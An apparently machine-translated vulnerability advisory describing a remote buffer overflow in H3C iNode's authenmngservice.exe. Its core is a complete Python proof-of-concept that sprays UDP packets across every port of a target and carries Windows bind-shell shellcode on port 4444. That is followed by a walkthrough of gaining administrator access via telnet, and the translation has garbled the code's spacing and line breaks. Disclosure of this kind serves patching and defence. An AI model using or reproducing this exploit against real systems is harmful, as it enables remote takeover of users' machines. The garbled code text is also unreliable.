H3C iNode is a management software designed and developed by Hangzhou H3C Communication Technology Co., Ltd. for user authentication and internet access. The software has a buffer overflow vulnerability. Attackers can remotely send attack packets and trigger vulnerability overflow, execute the shell attack.
The vulnerability exists in the authenmngservice.exe file behind inodesoftware installation. It runs as an administrator and opens a port. This service module has a buffer overflow vulnerability. Attackers can remotely send UDP Attack Packets, trigger vulnerability overflow, and execute an attack shell. Software Versions involved in this vulnerability: iNode PC 5.2 (E0402) iNode PC 5.1 (E0304) iNode PC 5.0 (E0105) other earlier versions cannot be downloaded directly online and are not verified. The vulnerability is located in the sub_459F10 function of IDA disassembly result. The memcpy function of the vulnerability at 0x45A235 is located as follows: the number of copied bytes is under external control, so malicious data is imported, this vulnerability can cause remote buffer overflow and trigger the code poc. py:
Import socketimport timeExploit_addr = raw_input ("input attack ip addr:") s = socket. socket (socket. AF_INET, socket. SOCK_DGRAM) # bind the shellcode on port 4444, after the overflow succeeds, telnet to the target host shellcode = "\ xfc \ xe8 \ x89 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31" \ "\ xd2 \ x64 \ x8b \ x52 \ x30 \ x8b \ x52 \ x0c \ x8b \ x52 "\" \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26 \ x31 \ xff "\ "\ x31 \ xc0 \ xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1" \ "\ xcf \ x0d \ x01 \ xc7 \ xe2 \ xf0 \ x52 \ x57 \ x8b \ x52 "\" \ x10 \ x8b \ x42 \ x3c \ x01 \ xd0 \ x8b \ x40 \ x78 \ x85 "\" \ xc0 \ x74 \ x4a \ x01 \ xd0 \ x50 \ x8b \ x48 \ x18 \ x8b "\" \ x58 \ x20 \ x01 \ xd3 \ xe3 \ x3c \ x49 \ x8b \ x34 \ x8b "\" \ x01 \ xd6 \ x31 \ xff \ x31 \ xc0 \ xac \ xc1 \ xcf \ x0d "\" \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf4 \ x03 \ x7d \ xf8 \ x3b" \ "\ x7d \ x24 \ x75 \ xe2 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3" \ "\ x66 \ x8b \ x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b "\" \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44 \ x24 \ x24 \ x5b \ x5b "\" \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x58 \ x5f \ x5a \ x8b "\" \ x12 \ xeb \ x86 \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 "\" \ x77 \ x73 \ x32 \ x5f \ x54 \ x68 \ x4c \ x77 \ x26 \ x07 "\" \ xff \ xd5 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29 \ xc4 \ x54 "\" \ x50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x50 \ x50 "\" \ x50 \ x50 \ x40 \ x50 \ x40 \ x50 \ x68 \ xea \ x0f \ xdf "\" \ xe0 \ xff \ xd5 \ x89 \ xc7 \ x31 \ xdb \ x53 \ x68 \ x02 "\" \ x00 \ x11 \ x5c \ x89 \ xe6 \ x6a \ x10 \ x56 \ x57 \ x68 "\" \ xc2 \ xdb \ x37 \ x67 \ xff \ xd5 \ x53 \ x57 \ x68 \ xb7 "\" \ xe9 \ x38 \ xff \ xd5 \ x53 \ x53 \ x57 \ x68 \ x74 "\" \ xec \ x3b \ xe1 \ xff \ xd5 \ x57 \ x89 \ xc7 \ x68 \ x75 "\" \ x6e \ x4d \ x61 \ xff \ xd5 \ x68 \ x63 \ x6d \ x64 \ x00 "\" \ x89 \ xe3 \ x57 \ x57 \ x57 \ x31 \ xf6 \ x6a \ x12 \ x59 "\" \ x56 \ xe2 \ xfd \ x66 \ xc7 \ x44 \ x24 \ x3c \ x01 \ x01 "\" \ x8d \ x44 \ x24 \ x10 \ xc6 \ x00 \ x44 \ x54 \ x50 \ x56 "\" \ x56 \ x56 \ x46 \ x56 \ x4e \ x56 \ x56 \ x53 \ x56 \ x68 "\"\ x79 \ xcc \ x3f \ x86 \ xff \ xd5 \ x89 \ xe0 \ x4e \ x56 "\" \ x46 \ xff \ x30 \ x68 \ x08 \ x87 \ x1d \ x60 \ xff \ xd5 "\" \ xbb \ xf0 \ xb5 \ xa2 \ x56 \ x68 \ xa6 \ x95 \ xbd \ x9d "\" \ xff \ xd5 \ x3c \ x06 \ x7c \ x0a \ x80 \ xfb \ xe0 \ x75 "\" \ x05 \ xbb \ x47 \ x13 \ x72 \ x6f \ x6a \ x00 \ x53 \ xff "\" \ xd5 "exploit_data =' \ x00 \ x01 '+ 'A' * 14 +' \ xDA \ xF4 \ x54 \ xA3 \ x57 \ xEA \ xA2 \ x58 \ xFF \ xA0 \ x61 \ xD7 \ xFB \ xAF \ x3C \ x9C '+' \ x01 \ x01 \ x01 \ x21 \ x08 '+' \ x22 '* 7 +' \ x01 '+' \ x90' * 335 + shellcode + '\ xE9 \ x13 \ xFE \ xFF' + 'A' * 7 + '\ xEB \ xF2 \ x90 \ x90 \ x71 \ x15 \ xFA \ x7f' +' \ x71 \ x15 \ xFA \ x7F '+' \ x90' * 15 + '\ xEB \ xE3' for port in range (1024,655 36): address = (Exploit_addr, port) s. sendto (exploit_data, address) print 'port: ', porttime. sleep (0.001) s. close () print 'ploit end' raw _ input ()
After the software is installed, authenmngservice.exe runs as administrator. After the attack program is enabled and the IP address is entered to launch the attack program, you can see that the program has not exited. When you enable telnet to prepare the connection target, you can see that you have remotely logged on to the target system, but the attacked program has not exited. Enter the calc.execommand to start the computer. You can see that calc.exe is the administrator privilege.
Solution:H3C has released a vulnerability-targeted solution and a new inode version. Reference link: http://kms.h3c.com/kms/kms/search/view.html? Id = 23553